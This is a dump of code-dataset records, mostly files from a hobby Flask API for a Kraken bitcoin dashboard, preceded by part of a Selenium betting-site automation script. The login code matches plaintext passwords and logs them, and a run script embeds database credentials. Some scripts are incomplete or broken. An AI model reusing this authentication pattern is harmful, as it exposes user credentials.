\ndriver.find_element_by_name(\"dnn$ctr433$Login$Login_DNN$txtUsername\").send_keys(USERNAME)\ndriver.find_element_by_name(\"dnn$ctr433$Login$Login_DNN$txtPassword\").send_keys(PASSWORD)\ndriver.find_element_by_name(\"dnn$ctr433$Login$Login_DNN$txtPassword\").send_keys(Keys.ENTER) \n\nwhile True:\n t_end = time.time() + 60 * 10\n while time.time() < t_end:\n time.sleep(5)\n driver.get('https://www.oddsmonkey.com/Tools/Matchers/EachwayMatcher.aspx') \n #sort by SNR rating\n driver.find_element_by_xpath(\"/html/body/form/div[3]/div[1]/div[2]/div/div/div/div/div/div/div[5]/div/div[2]/div/table/thead/tr/th[18]/a\").click()\n time.sleep(5)\n\n #select extraplace\n driver.find_element_by_xpath(\"/html/body/form[1]/div[3]/div[1]/div[2]/div/div/div/div/div/div/div[5]/div/div[1]/div/div/div/div/ul/li[2]/a/span/span/span/span\").click()\n\n #autorefresh every minute\n driver.find_element_by_xpath(\"/html/body/form[1]/div[3]/div[1]/div[2]/div/div/div/div/div/div/div[5]/div/div[1]/div/div/div/div/ul/li[8]/div/button[2]\").click()\n time.sleep(3)\n driver.find_element_by_xpath(\"/html/body/form[1]/div[3]/div[1]/div[2]/div/div/div/div/div/div/div[5]/div/div[1]/div/div/div/div/ul/li[8]/div/ul/li[1]/a\").click()\n\n while True:\n try:\n race = driver.find_element_by_xpath(\"/html/body/form/div[3]/div[1]/div[2]/div/div/div/div/div/div/div[5]/div/div[2]/div/table/tbody/tr[1]/td[8]\").text\n if is_time_in_5 (race) == False:\n rating = driver.find_element_by_xpath(\"/html/body/form/div[3]/div[1]/div[2]/div/div/div/div/div/div/div[5]/div/div[2]/div/table/tbody/tr[1]/td[17]\").text\n odds = driver.find_element_by_xpath(\"/html/body/form/div[3]/div[1]/div[2]/div/div/div/div/div/div/div[5]/div/div[2]/div/table/tbody/tr[1]/td[13]\").text\n arbrating = driver.find_element_by_xpath(\"/html/body/form/div[3]/div[1]/div[2]/div/div/div/div/div/div/div[5]/div/div[2]/div/table/tbody/tr[1]/td[19]\").text\n notify(title = \"Rating: {}\".format(rating), subtitle = \"Race: {}\".format(race), message = \"Odds: {} Arb Rating : {}\".format(odds, arbrating))\n print(race)\n except: \n Exception\n time.sleep(60)" }, { "alpha_fraction": 0.8052805066108704, "alphanum_fraction": 0.8085808753967285, "avg_line_length": 49.5, "blob_id": "7d2a69402c79b80ee3eeaba6c57c6c3e7506d094", "content_id": "ffc17070ae96c8802099cfbfb04a265f0b6ed71e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 303, "license_type": "no_license", "max_line_length": 124, "num_lines": 6, "path": "/README.md", "repo_name": "iholdroyd/oddsmonkey_eachway_calculator_automation", "src_encoding": "UTF-8", "text": "# oddsmonkey_eachway_calculator_automation\nThis script allows automation of the oddsmonkey eachway calculator.\n\nA decent description of the use of this, and how i built it can be found at http://www.advancedmatchedbetting.com/blogpost/0\n\nFor anyone wanting to discus this, please feel free to email me!\n" } ]
2
robinvanleeuwen/bitcoin-api
https://github.com/robinvanleeuwen/bitcoin-api
1510031142f9380034db506a5226c42a67834d80
9c4150769f8d967f1a16a27912189b88f7e8fbcd
848057365ed4bed4869d2582f6755e0ea5ddebbd
refs/heads/master
2022-12-09T20:26:06.955000
2021-04-20T19:24:42
2021-04-20T19:24:42
201,117,544
2
0
null
2019-08-07T19:47:20
2022-09-24T23:21:37
2022-12-08T05:59:19
Jupyter Notebook
[ { "alpha_fraction": 0.7615384459495544, "alphanum_fraction": 0.7615384459495544, "avg_line_length": 20.66666603088379, "blob_id": "4479f02f1e3ebd4a5110981acd192c676e80bfa4", "content_id": "275d337e77a6ad08a58befa6c94dc55e7950663d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 130, "license_type": "no_license", "max_line_length": 38, "num_lines": 6, "path": "/api/orders.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "from flask import Blueprint\nfrom auth import LoginManager\n\nlogin_manager = LoginManager()\n\norders = Blueprint(\"orders\", __name__)\n" }, { "alpha_fraction": 0.5500950217247009, "alphanum_fraction": 0.561498761177063, "avg_line_length": 26.90151596069336, "blob_id": "df7afb0b39cae58acbffdadb4b0f0100b7b20d83", "content_id": "5758a932a101530d31c6576ed892f4c17cd8ed60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3683, "license_type": "no_license", "max_line_length": 87, "num_lines": 132, "path": "/app.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "\"\"\"\nUsage: app.py [-a] [(-o -i <integer>)] [-t] | --inspect\n\nDashboard API for crypto currency\n\nArguments:\n -a Run API\n -o Run OHLC websocket\n -i <int> OHLC interval in minutes\n -t Run ticker websocket\n -h Help\n --inspect Run inspector on ticker data\n\"\"\"\n\nimport os\nimport sys\nfrom time import sleep\n\nfrom flask import request, jsonify, render_template\nfrom flask_api import FlaskAPI\nfrom flask_cors import CORS, cross_origin\n\nfrom config import app_config\n\nfrom log import log\nfrom docopt import docopt\n\nimport threading\n\nconfig_name: str = os.getenv(\"APP_SETTINGS\")\n\nif config_name is None:\n log.error(\"Missing APP_SETTINGS= environment variable.\")\n sys.exit(0)\n\nif os.getenv(\"DATABASE_URL\") is None:\n log.error(\"Missing DATABASE_URL= environment variable.\")\n sys.exit(0)\n\n\ndef create_app() -> FlaskAPI:\n\n app: FlaskAPI = FlaskAPI(__name__)\n app.config.from_object(app_config[config_name])\n app.config['ENV'] = config_name\n return app\n\n\napp = create_app()\ncors = CORS(app, resources={r\"*\": {\"origins\": \"*\"}})\n\ndef main():\n\n from portfolio import Portfolio\n\n args = docopt(__doc__)\n\n if args[\"-i\"]:\n intervals = list()\n for i in args[\"-i\"].split(\",\"):\n try:\n intervals.append(int(i))\n except Exception as e:\n log.error(\"Could not interpret intervals, use comma-seperated list.\")\n sys.exit(1)\n\n if int(i) not in [0, 1,5,15,30,60,240]:\n log.error(\"Invalid ticker/OHLC interval use: 1, 5, 15, 30, 60 or 240.\")\n sys.exit(1)\n\n if args[\"-o\"]:\n from kraken_websocket import run_ohlc_websocket, kraken_rest_api_to_psql\n\n if intervals == 0:\n log.info(\"Retrieving all intervals\")\n for i in [1,5,15,30,60,240]:\n kraken_rest_api_to_psql(interval=i)\n log.info(\"...\")\n sys.stdout.flush()\n sleep(2)\n sys.exit(0)\n\n threads = list()\n for i in intervals:\n threads.append(threading.Thread(target=run_ohlc_websocket, args=(i,)))\n\n for t in threads:\n t.start()\n\n if args[\"-a\"]:\n from db import db\n db.init_app(app)\n from api.account import account_bp\n from api.orders import orders\n from api.ohlc import ohlc_bp\n\n @app.route(\"/login\", methods=['GET', 'POST', 'OPTIONS'])\n @cross_origin(allow_headers=['Content-Type'])\n def login() -> dict:\n from auth import LoginManager\n login_manager = LoginManager()\n return login_manager.login()\n\n # select t.token, u.name from tokens as t\n # join users as u on user_id = u.id\n # where u.name = 'banana'\n # order by timestamp desc\n # limit 1;\n return jsonify({\"token\": \"9b6e1d23-a656-4118-9037-ebf288536ad5\"})\n\n app.register_blueprint(account_bp, url_prefix=\"/account\")\n app.register_blueprint(orders, url_prefix=\"/orders\")\n app.register_blueprint(ohlc_bp, url_prefix=\"/graph\")\n app.run(debug=config_name != \"production\")\n\n if args[\"-t\"]:\n\n from kraken_websocket import run_ticker_websocket\n portfolio = Portfolio()\n\n thread = threading.Thread(target=run_ticker_websocket, args=(portfolio,))\n thread.start()\n\n if args[\"--inspect\"]:\n from kraken_inspect import run\n run()\n\n if not args[\"-a\"] and not args[\"-t\"] and not args[\"--inspect\"] and not args[\"-o\"]:\n print(__doc__)\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6416938304901123, "alphanum_fraction": 0.6416938304901123, "avg_line_length": 21, "blob_id": "db4a6596277ba7b3c3c218a8d34503b38937be3a", "content_id": "9c341f9722e3b021e43352e5689a797e8cf50666", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 307, "license_type": "no_license", "max_line_length": 49, "num_lines": 14, "path": "/setup.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "import krakenex\n\nfrom log import log\n\ndef get_kraken_api():\n api = krakenex.API()\n try:\n api.load_key(\"/etc/kraken-api.key\")\n except FileNotFoundError as e:\n log.error(f\"Could not load keyfile: {e}\")\n return False\n\n log.debug(\"Kraken API loaded successfully\")\n return api" }, { "alpha_fraction": 0.6085761189460754, "alphanum_fraction": 0.6107751727104187, "avg_line_length": 26.56818199157715, "blob_id": "e091198edf484007e12aa551255a87b644d19aba", "content_id": "f67289e9415417377d9eb0ece99441553aec9a6a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3638, "license_type": "no_license", "max_line_length": 108, "num_lines": 132, "path": "/api/account.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "import krakenex\n\nfrom flask import Blueprint\nfrom decimal import Decimal\n\nfrom auth import LoginManager\nfrom db import db\nfrom db.models import Ohlc\nfrom log import log\nfrom setup import get_kraken_api\nfrom portfolio import Portfolio\n\naccount_bp = Blueprint(\"account_bp\", __name__)\n\nlog.warning(\"Loading api.account\")\n\nlogin_manager = LoginManager()\n\n\ndef get_current_ticker_info(account: str = \"kraken\") -> dict:\n \"\"\"\n The ticker (current price) for a specific exchange.\n\n :return: JSON with ticker information\n \"\"\"\n\n if account == \"kraken\":\n\n kraken_api = krakenex.API()\n\n data = {\"pair\": [\"XXBTZEUR\"]}\n result = kraken_api.query_public(\"Ticker\", data=data)\n log.debug(result)\n return {\"account\": account, \"XXBTZEUR\": result[\"c\"][0]}\n\n\n\n if account == \"local\":\n record = (\n db.session()\n .query(Ohlc)\n .filter(Ohlc.interval == 1)\n .order_by(Ohlc.endtime.desc())\n .limit(1)\n .one_or_none()\n )\n\n if record:\n return {\"account\": account, \"XXBTZEUR\": record.close}\n else:\n return {\"error\": \"no data available\"}\n\n else:\n log.error(\"get_current_ticker_info(): No valid account given.\")\n return {\"error\": \"No valid account\"}\n\n\n@account_bp.route(\"/balance\", methods=[\"GET\", \"POST\", \"OPTIONS\"])\n@login_manager.token_required\ndef api_balance():\n \"\"\"\n Get the total balance and the open balance available for trading.\n :return:\n \"\"\"\n api = get_kraken_api()\n print(\"BALANCE!\")\n if not api:\n return {\"error\": \"Could not load Kraken API, check log.\"}\n\n log.debug(\"Getting account balance\")\n balance = dict()\n balance[\"total\"] = api.query_private(\"Balance\")[\"result\"]\n balance[\"total\"] = correct_currency_in_dictionary(balance[\"total\"])\n\n log.debug(\"Getting open orders\")\n open_orders = api.query_private(\"OpenOrders\")\n\n print(f\"DEBUG: {open_orders}\")\n open_orders = open_orders[\"result\"]\n # Make a copy of the total dict, so we can calculate\n # the remaining balance available for trading on this\n # copy.\n balance[\"available\"] = dict()\n balance[\"available\"] = balance[\"total\"].copy() # Leave total balance intact.\n\n log.debug(\"Calculating balance available for trades\")\n for order_id, order in open_orders[\"open\"].items():\n volume = Decimal(order['vol']) - Decimal(order['vol_exec'])\n log.debug(volume)\n\n descr = order[\"descr\"]\n pair = descr[\"pair\"]\n price = Decimal(descr[\"price\"])\n\n base = pair[:3] if pair != \"DASHEUR\" else \"DASH\"\n quote = pair[3:] if pair != \"DASHEUR\" else \"EUR\"\n\n if descr[\"type\"] == \"buy\":\n balance[\"available\"][quote] -= volume * price\n\n if descr[\"type\"] == \"sell\":\n balance[\"available\"][base] -= volume\n\n return {\n \"balance\": balance,\n \"error\": \"\"\n }\n\n\n@account_bp.route(\"/portfolio\", methods=[\"POST\", \"OPTIONS\"])\n@login_manager.token_required\ndef portfolio():\n p = Portfolio()\n return p.get_summary()\n\n\n@account_bp.route(\"/trades\", methods=[\"POST\", \"OPTIONS\"])\n@login_manager.token_required\ndef trades():\n return {\"trades\": []}\n\n\ndef correct_currency_in_dictionary(dictionary):\n \"\"\"\n Correct the currency in a dictionary to a 3 letter key.\n XXBT => XBT, ZEUR => EUR, except with DASH which stays\n the same.\n :param dictionary:\n :return: dictionary with correct keys\n \"\"\"\n log.debug(\"Correcting currency in dictionary\")\n return {key[1:]: Decimal(value) for key, value in dictionary.items() if len(key) == 4 and key != \"DASH\"}" }, { "alpha_fraction": 0.5323799252510071, "alphanum_fraction": 0.5372369289398193, "avg_line_length": 27.90625, "blob_id": "f5a3dc8d0e6ae32fb81dd9a1ec579a92059bd6f0", "content_id": "d03c2bc6139e5b8f77c57b4f0b47dd1169aeaa9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3706, "license_type": "no_license", "max_line_length": 92, "num_lines": 128, "path": "/auth/__init__.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "from datetime import datetime\nfrom uuid import uuid4\n\nimport simplejson as json\nfrom functools import wraps\nfrom flask import request, g\nfrom sqlalchemy import and_\n\nfrom log import log\nfrom db import db\nfrom db.models import Users, Tokens\n\n\nclass LoginManager(object):\n\n def token_required(self, f):\n\n @wraps(f)\n def wrapper(*args, **kwargs):\n print(request.data)\n token = request.data.get('token', False)\n username = request.data.get(\"username\", False)\n log.debug(token)\n log.debug(username)\n if not token or not username:\n return {\"error\": \"not authenticated!\"}\n\n validation = self.validate_token(token, username)\n\n if validation == \"expired\":\n return {\"error\": \"token expired\"}\n\n if validation == \"invalid\":\n return {\"error\": \"not authenticated\"}\n\n if validation == \"valid\":\n return f(*args, **kwargs)\n\n return wrapper\n\n def validate_token(self, token, username):\n record = db.session().query(Tokens).join(Users, Users.name == username).filter(\n Tokens.token == token\n ).one_or_none()\n\n if record is None:\n log.debug(\"Invalid token\")\n return \"invalid\"\n\n if record.ttl_max is None:\n log.debug(\"Invalid token, ttl_max is None\")\n return \"expired\"\n\n if datetime.now() > record.ttl_max:\n log.debug(f\"Token expired (was valid until: {record.ttl_max}), removing token.\")\n self.logout()\n return \"expired\"\n\n try:\n record.timestamp = datetime.now()\n db.session().commit()\n except Exception as e:\n log.error(f\"Could not update token: {e}\")\n return \"invalid\"\n\n log.debug(\"Token Valid\")\n return \"valid\"\n\n @staticmethod\n def logout():\n\n token = request.data.get('token', False)\n username = request.data.get(\"username\", False)\n\n record = db.session().query(Tokens).join(Users, Users.name == username).filter(\n Tokens.token == token\n ).one_or_none()\n\n if record is None:\n return False\n\n try:\n log.debug(f\"Removing token '{token}' for user '{username}'\")\n db.session().delete(record)\n db.session().commit()\n return True\n except Exception as e:\n log.error(f\"{e}\")\n return False\n\n def login(self):\n username = request.data.get(\"username\", False)\n password = request.data.get(\"password\", False)\n\n log.debug(f\"username: {username}\")\n log.debug(f\"password: {password}\")\n\n if not username or not password:\n return {\"error\": \"invalid credentials\"}\n\n user = db.session().query(Users).filter(\n and_(\n Users.name == username,\n Users.password == password\n )\n ).one_or_none()\n\n if not user:\n return {\"error\": \"invalid credentials\"}\n\n else:\n token = Tokens()\n token.ttl_max = \"2021-12-12 12:00:00\"\n token.token = self.generate_token()\n token.user = user\n token.timestamp = datetime.now()\n token.ttl_increment = 60\n try:\n db.session().add(token)\n db.session().commit()\n return {\"token\": token.token}\n except Exception as e:\n log.error(f\"Could not create token: {e}\")\n return {\"error\": \"could not create token\"}\n\n @staticmethod\n def generate_token():\n return uuid4()\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.5488325953483582, "alphanum_fraction": 0.5557382702827454, "avg_line_length": 25.20689582824707, "blob_id": "3393204f54a9bf48e551a7549aff8d35ec644e10", "content_id": "73c5843cdb9f2da5b9ee8e8c15f523f1a0e349e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3041, "license_type": "no_license", "max_line_length": 90, "num_lines": 116, "path": "/portfolio.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "from pprint import pprint\nfrom setup import get_kraken_api\nfrom log import log\n\nclass Singleton(type):\n\n _instances = {}\n\n def __call__(cls, *args, **kwargs):\n if cls not in cls._instances:\n cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)\n return cls._instances[cls]\n\n\nclass Portfolio(metaclass=Singleton):\n\n def __init__(self, base_currency = \"EUR\"):\n\n self._api = get_kraken_api()\n self.base = base_currency\n self.assets = list()\n self.amounts = dict()\n self.prices = dict()\n\n self.update_assets()\n self.update_price()\n\n def update_assets(self):\n log.debug(\"Update Assets\")\n balance = self._api.query_private(\"Balance\")\n\n for asset in balance[\"result\"].items():\n self.amounts[asset[0][1:]] = float(asset[1])\n if asset[0][0] == \"Z\": self.base = asset[0][1:]\n if asset[0][0] == \"X\": self.assets.append(asset[0][1:])\n\n def update_price(self):\n log.debug(\"Update Price\")\n if len(self.assets) == 0:\n self.update_assets()\n\n pairs = [f\"X{a}Z{self.base}\" for a in self.assets]\n\n for p in pairs:\n ticker = self._api.query_public('Ticker', {'pair': p})\n self.prices[p[1:4]] = float(ticker[\"result\"][p][\"c\"][0])\n\n\n def trades_history(self, type=None):\n result = self._api.query_private('TradesHistory')\n\n trades = result[\"result\"][\"trades\"]\n\n fee: float = 0.0\n for trade in trades.values():\n fee += float(trade[\"fee\"])\n print(fee)\n return trades\n\n def price_history(self, pair=None):\n pass\n\n @property\n def asset_amounts(self):\n return {x:self.amounts[x] for x in self.assets}\n\n @property\n def asset_value(self):\n values = dict()\n\n for x in self.assets:\n values[x] = self.prices[x] * self.amounts[x]\n\n return values\n\n @property\n def base_value(self):\n return self.amounts[self.base]\n\n\n @property\n def pairs(self):\n return [f\"{x}/{self.base}\" for x in self.assets]\n\n @property\n def total_value(self):\n return {self.base: sum(self.asset_value.values()) + self.base_value}\n\n def get_summary(self, update_assets=False):\n\n if update_assets: self.update_assets()\n\n self.update_price()\n\n summary = dict()\n summary[\"assets\"] = {x: dict() for x in self.assets}\n for x in summary[\"assets\"].keys():\n summary[\"assets\"][x] = {\n \"amount\": round(self.asset_amounts[x],6),\n \"value\": round(self.asset_value[x], 6)\n }\n\n summary[\"base_asset\"] = self.base\n summary[\"base_amount\"] = round(self.amounts[self.base],6)\n summary[\"total_value\"] = round(sum(self.asset_value.values()) + self.base_value,6)\n\n return summary\n\n def __str__(self):\n return str(self.get_summary())\n\n\nif __name__ == \"__main__\":\n p = Portfolio()\n pprint(p.get_summary())\n print(p)\n\n" }, { "alpha_fraction": 0.758169949054718, "alphanum_fraction": 0.7647058963775635, "avg_line_length": 29.600000381469727, "blob_id": "39c981d68e2d3fab2ae7e7a689242b8c4effc492", "content_id": "70416fde0c650cfecb8cd7f435567f1dc6d71e90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 153, "license_type": "no_license", "max_line_length": 59, "num_lines": 5, "path": "/run", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "#!/bin/bash\nexport DATABASE_URL='postgresql://rvl:rvl@localhost/kraken'\nexport APP_SETTINGS='development'\nsource ./venv/bin/activate\npython3 ./app.py -a\n" }, { "alpha_fraction": 0.6117045879364014, "alphanum_fraction": 0.6191360950469971, "avg_line_length": 22.40217399597168, "blob_id": "92e96a61379d1d79b4cca6292aac9b1fbe3830af", "content_id": "ea53a71d062656a71da967c8f40ec887100d5f43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2153, "license_type": "no_license", "max_line_length": 81, "num_lines": 92, "path": "/scripts.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "import logging\nimport sys\n\nimport requests\n\nfrom datetime import datetime\n\nfrom app import app, db\n\nlogging.basicConfig()\nlogging.getLogger(__name__).setLevel(logging.DEBUG)\nlog = logging.getLogger(__name__)\n\nlog.debug(\"Retrieving rates.\")\n\n\ndef get_kraken_ohlc(interval=1, since=0, pair=\"XXBTZEUR\"):\n data = dict()\n\n if since != 0:\n data[\"since\"] = since\n if interval != 0:\n data[\"interval\"] = interval\n data[\"pair\"] = pair\n\n\n response = requests.post(data=data, url=url)\n\n return response.json()\n\n\ndef get_last_ohlc_timestamp(interval: int):\n\n last_open_ohlc = (\n db.session.query(OhlcXXBTZEUR)\n .filter(OhlcXXBTZEUR.interval == interval)\n .order_by(OhlcXXBTZEUR.timestamp.desc())\n .first()\n )\n\n return last_open_ohlc\n\n\ndef fill_interval(interval=1, pair=\"XXBTZEUR\"):\n\n last_record = get_last_ohlc_timestamp(interval=interval)\n if last_record is not None:\n since = last_record.unixtime\n else:\n since = 0\n\n data = get_kraken_ohlc(since=since, interval=interval, pair=pair)\n log.debug(f'Got {len(data[\"result\"][pair])} records')\n for record in data[\"result\"][pair]:\n\n r = OhlcXXBTZEUR()\n r.interval = interval\n r.unixtime = record[0]\n r.timestamp = datetime.fromtimestamp(record[0])\n r.open = record[1]\n r.high = record[2]\n r.low = record[3]\n r.close = record[4]\n r.vwap = record[5]\n r.count = record[6]\n\n # If the kraken record matches the last record\n # in the database, replace the one in the db\n\n if last_record is not None and r.unixtime == last_record.unixtime:\n log.debug(f\"Removing record w timestamp: {last_record.timestamp}\")\n db.session.delete(last_record)\n db.session.commit()\n\n log.debug(f\"Adding record for timestamp: {r.timestamp} close: {r.close}\")\n\n db.session.add(r)\n db.session.commit()\n\n\nwith app.app_context():\n\n try:\n interval = sys.argv[1]\n except IndexError:\n interval = 1\n\n db.init_app(app)\n\n kraken_rest_api_to_psql(interval)\n\n fill_interval(interval)\n" }, { "alpha_fraction": 0.503164529800415, "alphanum_fraction": 0.700421929359436, "avg_line_length": 16.08108139038086, "blob_id": "86415417c57703257a1c52f065bc9995ad1597ad", "content_id": "8fddbf46b24e24060996d1d467ba3c36172c0bf9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 1896, "license_type": "no_license", "max_line_length": 25, "num_lines": 111, "path": "/requirements.txt", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "alembic==1.0.11\nappdirs==1.4.3\nasn1crypto==0.24.0\nattrs==18.2.0\nautobahn==20.12.3\nAutomat==0.7.0\nbackcall==0.1.0\nblack==19.3b0\nbleach==3.3.0\ncertifi==2019.6.16\ncffi==1.11.5\nchardet==3.0.4\nClick==7.0\ncoloredlogs==10.0\ncolorlog==4.0.2\nconstantly==15.1.0\ncryptography==3.3.2\ncycler==0.10.0\ndecorator==4.4.0\ndefusedxml==0.6.0\ndocopt==0.6.2\nentrypoints==0.3\nFlask==1.0.2\nFlask-API==1.1\nFlask-Cors==3.0.8\nFlask-Migrate==2.5.2\nFlask-Script==2.0.6\nFlask-SQLAlchemy==2.3.2\ngunicorn==19.9.0\nhumanfriendly==4.18\nhyperlink==18.0.0\nidna==2.8\nincremental==17.5.0\nipykernel==5.1.1\nipython==7.6.1\nipython-genutils==0.2.0\nipywidgets==7.5.0\nitsdangerous==1.1.0\njedi==0.14.1\nJinja2==2.11.3\njsonschema==3.0.1\njupyter==1.0.0\njupyter-client==5.3.1\njupyter-console==6.0.0\njupyter-core==4.5.0\nkiwisolver==1.1.0\nkraken-wsclient-py==0.0.4\nkrakenex==2.1.0\nMako==1.0.13\nMarkupSafe==1.1.1\nmatplotlib==3.1.1\nmistune==0.8.4\nmock==3.0.5\nmpl-finance==0.10.0\nnbconvert==5.5.0\nnbformat==4.4.0\nnose==1.3.7\nnotebook==6.1.5\nnumexpr==2.6.9\nnumpy==1.16.4\norca==1.5.1\npandas==0.25.0\npandocfilters==1.4.2\nparso==0.5.1\npexpect==4.7.0\npickleshare==0.7.5\nplotly==4.1.0\nprometheus-client==0.7.1\nprompt-toolkit==2.0.9\npsutil==5.6.6\npsycopg2==2.8.3\nptyprocess==0.6.0\npyasn1==0.4.5\npyasn1-modules==0.2.3\npycosat==0.6.3\npycparser==2.19\nPygments==2.7.4\nPyHamcrest==1.9.0\nPyJWT==1.7.1\npyOpenSSL==18.0.0\npyparsing==2.4.0\npyrsistent==0.15.3\npython-dateutil==2.8.0\npython-editor==1.0.4\npytz==2019.1\npyzmq==18.0.2\nqtconsole==4.5.1\nrequests==2.22.0\nretrying==1.3.3\nruamel.yaml==0.16.1\nruamel.yaml.clib==0.1.2\nSend2Trash==1.5.0\nservice-identity==18.1.0\nsimplejson==3.16.0\nsix==1.12.0\nSQLAlchemy==1.3.5\ntables==3.5.2\nterminado==0.8.2\ntestpath==0.4.2\ntoml==0.10.0\ntoolz==0.10.0\ntornado==6.0.3\ntraitlets==4.3.2\nTwisted==20.3.0\ntxaio==18.8.1\nurllib3==1.25.3\nwcwidth==0.1.7\nwebencodings==0.5.1\nWerkzeug==0.15.4\nwidgetsnbextension==3.5.0\nzope.interface==4.6.0\n" }, { "alpha_fraction": 0.8085106611251831, "alphanum_fraction": 0.8085106611251831, "avg_line_length": 18, "blob_id": "bd2f7eabb9bee54a99abaaaf87d3893480cb4776", "content_id": "7abdda048571394516078e34831f5c1159597989", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 94, "license_type": "no_license", "max_line_length": 39, "num_lines": 5, "path": "/db/__init__.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "from flask_sqlalchemy import SQLAlchemy\n\nfrom app import app\n\ndb: SQLAlchemy = SQLAlchemy(app)" }, { "alpha_fraction": 0.6060869693756104, "alphanum_fraction": 0.6139130592346191, "avg_line_length": 30.08108139038086, "blob_id": "07d3ddd9554ac92082471083e58bdd2914e6672a", "content_id": "9e2dcbd1cb66df6635833cf33f47e23c280a39af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1150, "license_type": "no_license", "max_line_length": 64, "num_lines": 37, "path": "/app-test.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "import unittest\nimport os\n\nfrom app import app, db\n\nTEST_DB = 'kraken-api.db'\n\nclass BasicTestCase(unittest.TestCase):\n\n def setUp(self):\n \"\"\"Set up a blank temp database before each test\"\"\"\n basedir = os.path.abspath(os.path.dirname(__file__))\n app.config['TESTING'] = True\n app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + \\\n os.path.join(basedir, TEST_DB)\n self.app = app.test_client()\n db.create_all()\n\n def tearDown(self):\n \"\"\"Destroy blank temp database after each test\"\"\"\n db.drop_all()\n\n def test_index(self):\n \"\"\"initial test. ensure flask was set up correctly\"\"\"\n tester = app.test_client(self)\n response = tester.get('/', content_type='text/html')\n self.assertEqual(response.status_code, 200)\n\n def test_database(self):\n \"\"\"initial test. ensure that the database exists\"\"\"\n tester = os.path.exists(\"kraken-api.db\")\n self.assertTrue(tester)\n\n def test_latest_gets_200(self):\n tester = app.test_client()\n response = tester.get('/latest')\n self.assertEqual(response.status_code, 200)\n" }, { "alpha_fraction": 0.5399869680404663, "alphanum_fraction": 0.5604681372642517, "avg_line_length": 31.04166603088379, "blob_id": "18cc7de57ce62a4d8c65e2413ee1a71b3ce43754", "content_id": "4c41f826c503780fd4b1cbb99a3e57e107aa4a2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3076, "license_type": "no_license", "max_line_length": 152, "num_lines": 96, "path": "/kraken_inspect.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "import time\nfrom decimal import Decimal as D\nfrom db.models import Ticker\nfrom db import db\nfrom log import log\n\ndef get_latest_ticker(interval=0):\n\n if interval == 0:\n record = db.session().query(Ticker).order_by(Ticker.timestamp.desc()).limit(1).one_or_none()\n return record\n\n else:\n query = f\"SELECT * FROM ticker WHERE to_timestamp(timestamp) > now() - interval '{interval} seconds'\"\n result = db.engine.execute(query)\n data = [x for x in result]\n\n return data\n\ndef run():\n\n warn_active_interval = 10\n warn_active_min_trades = 20\n warn_active_min_diff = D(25.0)\n\n log.info(f\"Setting up warning for active trades:\")\n log.info(f\"Interval : {warn_active_interval}\")\n log.info(f\"Max trades: {warn_active_min_trades}\")\n log.info(f\"Max diff : {warn_active_min_diff}\")\n log.info(\"------------------------------------------\")\n\n lws = 0.00\n while True:\n lws = warn_active_trading(\n interval=warn_active_interval,\n min_trades=warn_active_min_trades,\n min_diff=warn_active_min_diff,\n last_warning_timestamp=lws\n )\n time.sleep(1)\n\n\ndef warn_active_trading(\n interval: int=60,\n min_trades: int=5,\n min_diff: int=D(1.0),\n last_warning_timestamp=0.00):\n\n \"\"\"\n Warn if rapid fluctuations in price occur.\n\n Shows message if in the last {interval} seconds more than {min_trades} are being\n made, with a diffence greater than {min_diff} within this time.\n\n :param interval:\n :param min_trades:\n :param min_diff:\n :param last_warning_timestamp:\n :return:\n \"\"\"\n\n data = get_latest_ticker(interval)\n\n if len(data) == 0:\n log.debug(\"{a:19s} | | 0 trades | Tumbleweeds on tradingfloor... \".format(a=time.strftime ('%Y-%m-%d %H:%M:%S', time.localtime())))\n return -1.00\n\n if len(data) == 1:\n log.debug(\"{a:19s} | {b:10f} | 1 trade | Tumbleweeds on tradingfloor... \".format(\n a=time.strftime ('%Y-%m-%d %H:%M:%S', time.localtime(data[0]['timestamp'])),\n b=data[-1]['c_price'],\n c=len(data)\n ))\n return -1.00\n\n measured_diff = data[-1]['c_price'] - data[0]['c_price']\n\n log.debug(\"{a:19s} | {b:10f} | {c:3d} trades | diff {d:10f} | interval:{e:3d} | {f:18f} |\"\n .format(\n a=time.strftime ('%Y-%m-%d %H:%M:%S', time.localtime(data[0]['timestamp'])),\n b=data[-1]['c_price'],\n c=len(data),\n d=measured_diff,\n e=interval,\n f=data[-1]['timestamp']\n )\n )\n\n if len(data) >= min_trades and abs(measured_diff) > min_diff and 